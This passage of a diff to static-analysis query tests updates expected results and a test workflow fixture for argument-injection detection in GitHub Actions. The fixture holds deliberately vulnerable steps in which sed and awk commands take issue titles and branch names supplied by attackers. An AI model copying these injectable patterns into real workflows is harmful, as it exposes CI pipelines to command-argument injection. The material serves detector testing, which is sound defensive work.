\\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | 
.github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | 
gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| 
.github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | 
@@ -870,11 +879,11 @@ cfgNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:1:1:41:23 | enter on: push | -| .github/workflows/poisonable_steps.yml:1:1:41:23 | exit on: push | -| .github/workflows/poisonable_steps.yml:1:1:41:23 | exit on: push (normal) | -| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | 
@@ -935,8 +944,11 @@ cfgNodes | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -1047,7 +1059,7 @@ dfNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | 
@@ -1108,8 +1120,11 @@ dfNodes | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | 
@@ -1222,7 +1237,7 @@ nodeLocations | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | -| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:41:23 | .github/workflows/poisonable_steps.yml@5:5:41:23 | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:46:111 | .github/workflows/poisonable_steps.yml@5:5:46:111 | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | 
@@ -1283,8 +1298,11 @@ nodeLocations | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:14:39:55 | .github/workflows/poisonable_steps.yml@39:14:39:55 | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:9:41:6 | .github/workflows/poisonable_steps.yml@40:9:41:6 | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:14:40:73 | .github/workflows/poisonable_steps.yml@40:14:40:73 | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | .github/workflows/poisonable_steps.yml:41:9:41:23 | .github/workflows/poisonable_steps.yml@41:9:41:23 | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:9:42:6 | .github/workflows/poisonable_steps.yml@41:9:42:6 | | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:14:41:22 | .github/workflows/poisonable_steps.yml@41:14:41:22 | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:9:46:111 | .github/workflows/poisonable_steps.yml@42:9:46:111 | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:14:46:111 | .github/workflows/poisonable_steps.yml@42:14:46:111 | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:44:32:44:50 | .github/workflows/poisonable_steps.yml@44:32:44:50 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | 
.github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 |
 | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 |
@@ -1306,7 +1324,7 @@ scopes
 | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment |
 | .github/workflows/multiline2.yml:1:1:89:35 | on: |
 | .github/workflows/multiline.yml:1:1:89:29 | on: |
-| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push |
+| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push |
 | .github/workflows/test.yml:1:1:40:53 | on: push |
 sources
 | ahmadnassri/action-changed-files | * | output.files | filename | manual |
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml
index 3f2f30a78a03..09e540a0f1b0 100644
--- a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml
@@ -17,6 +17,14 @@ jobs:
 - run: awk "BEGIN {$TITLE}"
 - run: sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json
 - run: |
- # We consider | as a shell pipe so this one is not reported yet until
- # we can better identify all the commands in a shell script
 sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json
+ - run: |
+ sed -e 's##${TITLE}#' \
+ -e 's##${{ env.sot_repo }}#' \
+ -e 's##TITLE#' \
+ .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky
+ - run: |
+ sed -e 's##TITLE#' \
+ -e 's##${{ env.sot_repo }}#' \
+ -e 's##${TITLE}#' \
+ .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky
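Review bot: In both new steps `${TITLE}` sits inside a single-quoted sed expression (`'s##${TITLE}#'`), so the shell never expands it and sed receives the literal text; only `${{ env.sot_repo }}` is substituted, by the runner before the script runs. The companion .expected files in this commit still report these steps as argument injection reached from `github.event.issue.title`, so the fixture appears to document the query treating a quoted `${VAR}` reference as a sink rather than a reachable injection, and a comment above the two steps would keep that from being misread, e.g. `# ${TITLE} is single-quoted (not expanded); exercises env-var references inside a multi-line sed command`. The removed comment explained why the `s|…|` case was not reported; with it gone and that step now present in the expected results, a one-line note saying the `|`-delimiter case is now covered would keep the file self-describing. The two added steps differ only in the position of the `${TITLE}` argument, which is also worth stating so the second step is not taken for an accidental duplicate.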
diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected index b5d25bf0d135..b5df9a2cbd3c 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected @@ -3,6 +3,8 @@ edges | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | nodes | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | 
@@ -10,6 +12,9 @@ nodes | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | +| .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | +| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | subpaths #select | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | sed | 
@@ -17,3 +22,6 @@ subpaths | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | awk | | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | sed | +| .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | +| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | +| .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected index dfbf87174cc1..73413f51a392 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected 
@@ -3,6 +3,8 @@ edges | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | nodes | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | 
@@ -10,5 +12,8 @@ nodes | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | +| .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | +| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > 